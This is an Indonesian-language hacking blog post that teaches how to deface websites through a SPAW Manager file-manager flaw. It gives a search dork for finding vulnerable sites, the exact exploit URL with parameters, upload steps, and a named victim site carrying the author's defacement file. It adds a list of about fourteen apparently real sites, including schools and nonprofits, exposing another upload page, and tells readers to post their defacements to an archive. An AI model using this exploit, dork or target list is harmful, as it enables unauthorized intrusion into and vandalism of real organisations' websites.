Hmmm,Akyra lagi suntuk nih,,, ada yg mau nemenin ? :D :plakk hehehe,kali ini akyra mau bagi2 trik deface web dengan memanfaatkan spaw manager vulnerability oke langsung ke tutorialnya, siapin camilan biar gak suntuk kayak ane ,lagu-lagu pembangkit hawa semangat(ane saranin lagunya Avenged Sevenfold) dan secangkir es kopi :D hahaha langsung aja dah, pertama sobat harus lakukan adalah membuat HTML/TXT(terserah sobat), lalu mencari korban,gimana caranya??? gampanggg tulis aja dorknya di gugel : inurl:/spaw2/uploads/files/ udah nemu korban?langsung aja kasih exploitnya /spaw2/dialogs/dialog.php? module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494d a752d98cac9&type=file taruh exploit itu di belakang url web yang akan kita deface contohnya target : > http://www.takingcareofcoccidiosis.co.uk/admin/spaw2/uploads/files/ maka jika di tambah exploitnya menjadi : > http://www.takingcareofcoccidiosis.co.uk/admin/spaw2/dialogs/dialog.php? module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494d a752d98cac9&type=file nah,ntar sobat akan masuk ke suatu halaman yg namanya SPAW Manager,di situlah sobat akan meng upload file HTML sobat pas di SPAW Manager tersebut sobat ganti dari "Images" menjadi "Files" lalu sobat masukkan file HTML sobat di sana dengan cara klik browse>pilih file HTML/TXT/terserah sobat>uploads tunggu sampai proses peng upload'an nya selesai jika sudah selesai sobat bisa melihat hasil deface sobat dg url http://www.target.com/spaw2/uploads/files/nama_html_sobat.html ( kalau yg sobat upload adalah file html,kalo txt ya tinggal ganti .html menjadi .txt) atau dengan cara klik download file yang ada di sebelah kanan liat aja punya saya :D http://www.takingcareofcoccidiosis.co.uk/admin/spaw2/uploads/files/Defaced.txt ___________________________________________________________________________________ Akyra-Troyer http://troyer-piece.blogspot.com
http://lakeguntersville.org/RTE_popup_file_atch.asp http://solonschools.org/portal/webquest/RTE_popup_file_atch.asp http://adventureandspirit.com/ RTE_popup_file_atch.asp http://admin.healthyudelmarva.org/RTE_popup_file_atch.asp http://adnormous.com/RTE_popup_file_atch.asp http://acbathai.org/admin/RTE_popup_file_atch.asp http://lksd.org/wow/aoody/RTE_popup_file_atch.asp http://tasar.org.uk/startpage/RTE_popup_file_atch.asp http://seacoastredondo.com/admin/RTE_popup_file_atch.asp http://plymouth-chamber.co.uk/RTE_popup_file_atch.asp http://pgathailand.com/scripts/RTE_popup_file_atch.asp http://loor.ir/sysop/RTE_popup_file_atch.asp http://jrf.org.tw/newjrf/RTE_popup_file_atch.asp http://rutc.ac.uk/corpnew/webwiz/RTE_popup_file_atch.asp oke udah kan ? selamat bersenang-senang wkwkwk jangan lupa hasil show off di archieve buat koleksi :* yowes muuah, ditunggu komennya